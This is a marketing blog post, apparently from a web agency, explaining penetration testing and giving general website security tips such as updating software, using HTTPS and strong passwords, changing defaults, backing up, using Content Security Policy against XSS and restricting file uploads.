7 easy to follow tips to help you prevent a data breach
With the recent SolarWinds hack making the news again recently, it’s time for us to all start asking ourselves if our website and systems are vulnerable to similar attacks. Now, I’m not necessarily saying that you’re at risk of a highly organised and targeted attack from a rogue state, however, all websites and systems can become a target for unscrupulous people, leading to all kinds of potential problems.
In light of our collective obligations to GDPR and at the very least, the preservation of our public image, it’s important to be able to ensure that our websites and systems are secure and that all of the data that we hold is kept away from prying eyes; this is why we’re highlighting the importance of regular penetration testing.
What is Penetration Testing?
Penetration Testing is a way of checking whether your system can be exploited in any way, often by using the exact same techniques that are used by people when trying to gain access. The National Cyber Security Centre has defined Penetration Testing (or Pen Testing) as “a method for gaining assurance in the security of an IT system by attempting to breach some or all of that system’s security, using the same tools and techniques as an adversary might”.
This is an authorised attack that aims to simulate a real-life cyberattack on a computer system and is essential for site owners to be able to evaluate any exploits that are possible.
As a result of Pen Testing, a company is able to identify any weaknesses that they can then aim to close the doors to.
How do you conduct a Penetration Test?
There are quite a few methods of penetration testing available and often, the type used usually reflects the system and importance of the system or data that you need to protect. For the purpose of this post, we’re going to focus on vulnerability testing for websites.
This type of testing is to ensure that developers adhere to secure development practices, by looking specifically for weaknesses or vulnerabilities that could compromise any data or at the very least, could be the cause of a loss of service or website functionality.
Why is it important?
There is not a single day where we’re not reading in the news about a company being breached, with even some of the highest profile companies falling victim. Recent breaches have included British Airways and EasyJet, which exposed the customer data of millions of people.
Our lives and businesses are increasingly reliant and built upon a digital framework, with this increasing exponentially since the COVID-19 pandemic struck. As a result, individuals or organised criminal organisations have been looking to capitalise on our vulnerabilities, resulting in cyber scams seeing a rise of over 31% between May-June 2020 alone! (*SecurityMagazine.com).
Security firm, Nexor, examined police data to reveal that between Sep 2019 and Sep 2020 3,445 businesses within the UK were victims of scams, with just under 50% taking place since lockdowns were introduced and are estimated to have cost over £6m.
What can you do to ensure that your data is safe?
To be honest, if someone is determined to gain access to your website or system, they will often find a way. However, this doesn’t mean that you have to make it easy for them. As with everything, some best practices can help you to protect yourself against attacks, and here are a few easy steps that people can take:
Keep your software up-to-date
One of the easiest things to do and should be a priority for everyone. The reason for this is that once a vulnerability or exploit has been identified, developers work hard to close the loophole. Likewise, all exploits are widely announced and hackers will always try to take advantage of these when they can.
Use HTTPS protocol
Along with providing good standing with Google and the benefits to a website’s SEO, HTTPS (Hypertext Transfer Protocol Secure, if you wanted to know) is a security protocol that ensures that users are connecting to the correct server and that all data being transferred cannot be intercepted. This is especially important when managing login details or accepting payment detail through your website.
Ensure that you use strong passwords
The biggest weakness for any system is the user. We all know that we should use complex passwords to gain access to sensitive information, but many people still don’t.
We cannot emphasise this enough and you would genuinely be shocked to see how many people use default passwords or very simple passwords to protect their websites (in fact, the number one password still being used is 123456!!)
As a rule, don’t use any personal information such as your birthday, or mother’s maiden name as these can be found out easily, and definitely no more “Password1” people… you know who you are!
Don’t rely on default settings
Common attacks on websites are automated by bots and rely on people not changing their default settings for their CMS. You can change these very simply, along with providing different security access for the different users to your site.
Does the new office junior who updates the blog each week, really need full access and be able to change all passwords and delete the website? Probably not.
Backup regularly
The worst-case scenario for any breach or attack is that you can lose everything. Think about the impact that this would have, not good, right? The simplest way of ensuring that this doesn’t happen is to ensure that you backup regularly, we would even recommend multiple backups.
There are then the more advanced methods that you can implement, such as:
Protect against XSS attacks
XSS attacks are Cross-Site Scripting attacks and are when a hacker injects malicious JavaScript code into your website. This then allows them to change content and capture information that is being submitted to your site in good faith.
A way to defend against this is to use Content Security Policy (CSP), which is a really handy tool that sets which domains a browser should accept scripts from. This in turn makes a website more secure, as the user’s browser will know to ignore any malicious script that may have been injected from elsewhere.
Be cautious of allowing file uploads
In some situations it’s important to allow users to upload files directly to a site, however, this functionality can be exploited and allow someone to inject a script that could open up a website to an attack.
There are ways of minimising any potential risk is to set limits on file size, file type, change the filename upon upload, scan for any malware, and ensuring that the upload folder is kept separate from the webroot.
How we can help
To ensure that your website is as secure as possible, we can conduct a Penetration Test to provide a full and comprehensive security check and uncover all vulnerabilities that your website and network infrastructures have.
Following our test, we would then provide you with a full report that details all of our findings, along with a detailed and actionable list of ways that these exploits can be prevented and all loopholes closed.
Please Contact Us for more information and to discuss how we could help you.